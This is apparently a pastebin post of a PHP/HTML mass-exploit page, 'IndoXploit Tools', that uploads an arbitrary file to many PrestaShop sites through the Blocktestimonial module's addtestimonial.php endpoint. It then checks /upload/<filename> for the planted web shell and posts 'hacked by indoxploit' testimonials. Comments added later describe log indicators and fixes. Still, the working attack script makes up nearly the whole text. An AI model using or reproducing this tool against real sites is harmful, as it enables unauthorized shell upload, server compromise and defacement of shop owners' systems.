
Prestashop Modules Blocktestimonial File Upload

AgusSR Dec 17th, 2016 (edited) 1,727 Never
  1. <html>
  2.     <head>
  3.     <title>Prestashop Blocktestimonial Modules File Upload</title>
  4.     <meta charset="UTF-8">
  5.     <meta name="author" content="IndoXploit - l0c4lh34rtz">
  6. <style type="text/css">
  7. html {
  8.     margin: 10px auto;
  9.     color: #000000;
  10. }
  11. header {
  12.     font-size: 40px;
  13.     text-align: center;
  14.     margin: 0px auto;
  15. }
  16. input[type=text] {
  17.     padding: 7px;
  18.     margin: 5px auto;
  19.     margin-left: 30px;
  20.     border: 0;
  21.     border-bottom: 1px solid #000000;
  22.     color: #bb0000;
  23.     width: 250px;
  24.     height: 25px;
  25.     outline: none;
  26. }
  27. .btn {
  28.   color: #ffffff;
  29.   width: 250px;
  30.   height: 25px;
  31.   background: #000000;
  32.   text-decoration: none;
  33. }
  34.  
  35. .btn:hover {
  36.   cursor: pointer;
  37.   text-decoration: none;
  38. }
  39. table {
  40.     margin-left: 30px;
  41. }
  42. textarea {
  43.     padding: 5px;
  44.     resize: none;
  45.     border: 1px solid #000000;
  46.     width: 550px;
  47.     height: 250px;
  48.     outline: none;
  49. }
  50. </style>
  51. </head>
  52. <header>IndoXploit Tools - PS Modules Blocktestimonial File Upload</header>
  53. <hr width="95%">
  54. <table width="100%" align="center">
  55. <form method="post" action="" enctype="multipart/form-data">
  56. <tr><td><pre>Filename   : <input type="text" name="filename" placeholder="idx.php" required></td></tr>
  57. <tr><td><pre>Script     : <br><textarea placeholder="Hacked by l0c4lh34rtz - IndoXploit" name="source" required></textarea></td>
  58. <td><pre>Target     : <br><textarea placeholder="www.target.com" name="target" required></textarea></td>
  59. </tr>
  60. <tr><td><input type="submit" class="btn" name="exploit" value="Xploit"></td></tr>
  61. </form>
  62. </table>
  63. <div style='margin: 5px auto; padding-left: 15px;'>
  64. <?php
// Lift PHP's execution time limit; presumably so one form submission can walk a long target list.
set_time_limit(0);
// Suppress every PHP notice, warning and error. Failed file writes or failed requests below are
// therefore silent and show up only through the status lines the script echoes.
error_reporting(0);
  67.  
/**
 * Thin wrapper around PHP's cURL extension, used for every outbound HTTP request this page makes.
 *
 * Review notes (defensive):
 *  - TLS peer and host verification are both switched off, so the identity of the remote
 *    server is never checked.
 *  - Every request carries the same hard-coded Firefox 2.0.0.6 User-Agent string. That fixed
 *    value is a usable signature when searching web-server access logs for traffic produced
 *    by this script.
 *  - curl_close() is placed after the return statement and is never reached; handles are
 *    released only when the PHP request ends.
 *
 * @param string     $url     Address to request.
 * @param bool       $post    When truthy, the request is sent as a POST carrying $data.
 * @param mixed      $data    Value handed to CURLOPT_POSTFIELDS (the caller in this file passes an array).
 * @param bool       $headers When truthy, $header is applied as the request headers.
 * @param array|null $header  Header lines for CURLOPT_HTTPHEADER; only read when $headers is truthy.
 * @param bool       $cookie  Truthy: read cookies from cookie.txt. Falsy: write cookies to cookie.txt.
 * @return array Two keys: "http" (status code reported by curl_getinfo) and "response"
 *               (the curl_exec result: the body as a string, or false on failure).
 */
function curl($url,$post,$data,$headers,$header,$cookie) {
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_URL, $url);
          // Return the body from curl_exec() instead of printing it.
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          // Fixed, outdated browser string sent on every request (log-searchable indicator).
          curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
          // Redirects are followed, so the status code reported is that of the final hop.
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
          // Certificate chain and hostname checks are disabled for HTTPS targets.
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
          // Give up on hosts that do not accept a connection within 5 seconds.
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    if($post) {
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    // The two branches are exclusive: a call either reads cookie.txt or writes it, never both.
    // cookie.txt is a relative path, so it resolves against the working directory of the PHP process.
    if($cookie) {
          curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
    } else {
          curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
    }
    if($headers) {
          curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    $exec = curl_exec($ch);
    $info = curl_getinfo($ch);
    return array(
        "http" => $info['http_code'],
        "response" => $exec
    );
          // Unreachable: execution has already returned above.
          curl_close($ch);
}
  97.  
// Request handling for the form above. Review notes (defensive):
//  - This page is itself an unauthenticated file-write primitive on whatever server hosts it:
//    the "source" field is written verbatim to a file named by the "filename" field.
//    htmlspecialchars() only encodes HTML metacharacters; it does not restrict the extension
//    or remove path separators. Finding this page on a server should be handled as a
//    compromise of that server.
//  - Traces left on a targeted PrestaShop site, all taken from the values below: a POST to
//    /modules/blocktestimonial/addtestimonial.php, a GET to /upload/<filename> from the same
//    client, the fixed User-Agent set in curl(), and testimonial entries whose name or text
//    contains "indoxploit".
//  - The exposure on the shop side is the module endpoint accepting an uploaded file;
//    presumably it checks neither the file type nor the caller (confirm against the module
//    source). Removing or updating the module, validating uploads server-side and disabling
//    script execution under /upload/ address it.
$filename = htmlspecialchars($_POST['filename']);
// Taken from the request without any filtering.
$script = $_POST['source'];
// One target per line; only CRLF is treated as a separator.
$domains = explode("\r\n", htmlspecialchars($_POST['target']));
// Null when the form was not submitted (the notice is hidden by error_reporting(0)).
$go = $_POST['exploit'];

if(isset($go)) {
    // Writes the submitted content into a local file, relative to the working directory.
    // The fopen/fwrite results are not checked.
    $handle = fopen($filename, "w");
    fwrite($handle, $script);
    fclose($handle);

    foreach($domains as $target) {
        // Entries without a scheme become "http://<entry>/". Because of the added trailing
        // slash, the request paths built below then start with "//", which is visible in
        // access logs.
        if(!preg_match("/^http:\/\//", $target) AND !preg_match("/^https:\/\//", $target)) {
            $target = "http://$target/";
        }
        echo "[+] URL: $target<br>";
        // Form fields submitted to the module; the text values are constant across targets.
        $post = array(
            "testimonial_submitter_name" => "indoxploit",
            "testimonial_title" => "hacked by indoxploit",
            "testimonial_main_message" => "hacked by indoxploit",
            "testimonial_img" => "@$filename",
            "testimonial" => "Submit Testimonial",
        );
        $exploit = curl("$target/modules/blocktestimonial/addtestimonial.php", TRUE, $post, FALSE, NULL, TRUE);
        // The follow-up GET is issued for every target, whether or not the POST succeeded.
        $cek_shell = curl("$target/upload/$filename", FALSE, NULL, FALSE, NULL, FALSE);
        // Success is judged only by the module's confirmation text in the response body.
        if(preg_match("/Your testimonial was submitted successfully./", $exploit['response'])) {
            echo "[+] Successfully !<br>";
            // Redirects are followed in curl(), so a 200 here may belong to a redirected page.
            if($cek_shell['http'] == 200) {
                echo "[+] $target/upload/$filename<br><br>";
            } else {
                echo "[+] Shell not Found :(<br><br>";
            }
        } else {
            echo "[+] Fail :(<br><br>";
        }
    }
}
  134. ?>
  135. </div>
  136. </html>